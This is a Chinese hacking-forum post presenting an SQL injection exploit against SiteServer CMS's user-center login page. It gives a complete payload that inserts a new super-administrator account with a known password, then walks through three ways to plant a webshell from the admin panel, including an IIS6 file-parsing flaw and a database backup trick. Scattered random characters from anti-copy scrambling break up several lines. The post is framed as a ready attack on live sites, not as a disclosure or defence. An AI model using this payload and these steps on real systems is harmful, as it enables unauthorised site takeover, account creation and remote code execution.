找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2862|回复: 0
打印 上一主题 下一主题

SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:40:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版/ e6 O- e8 j8 x9 X
stieserver官网:www.siteserver.cn
9 t5 l6 _6 Z+ Q8 ZEXP:$ M$ y# p( ^1 E  ~5 B5 r4 f
直接访问UserCenter/login.aspx% [/ G8 Z. ?7 E
用户名处输入:
6 W* Y1 W+ z: I* o* @7 p
$ c6 o1 A: |5 [% X5 m* ?  @123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–7 M! H7 l' s2 F& P! y, _4 F/ g
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。8 ?5 c6 }9 O- j4 I' _0 V
之后再访问后台SiteServer/login.aspx用插入的用户登陆# i# _, t5 H3 X. A( [# J8 f- `
后台拿webshell的三种方法:* b3 z' O' t% k. j8 z9 P' I/ h
一、
$ y- _& i4 Q9 M5 I- G  ]$ ~站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
- F3 i: y- [6 l; n二、# C7 d6 u" J% b  C+ p/ F
成员权限-》添加用户-》用户名为:1.asp) r- X  n2 b* j- P8 `
http://127.0.0.1/usercenter/
1 C) H3 ^% W3 A, Y0 H" R5 i用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
" [- \# I: [# ~9 }+ |(ps:后台添加用户时不会验证是否含有非法字符)
: u  M- ?4 _6 T; K三、3 q/ N& X0 L/ O7 N0 v2 ~# R- [
系统工具-》实用工具-》机器参数查看
4 r0 M6 j% y% q3 _4 r; s* O1 Q- E可以看到数据库类型、名称,WEB路径; C' s5 h  z" ~9 ^) j) T
系统工具-》数据库工具-》SQL语句查询
: _8 D7 W" y7 c& d这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表